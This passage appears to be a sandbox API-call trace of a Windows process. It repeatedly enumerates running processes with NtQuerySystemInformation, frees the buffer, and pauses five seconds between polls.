ResultLength=0x0) returned 0xc0000004 [0261.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.183] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.239] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.320] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.368] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.375] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.466] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.487] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.489] NtAllocateVirtualMemory (in: 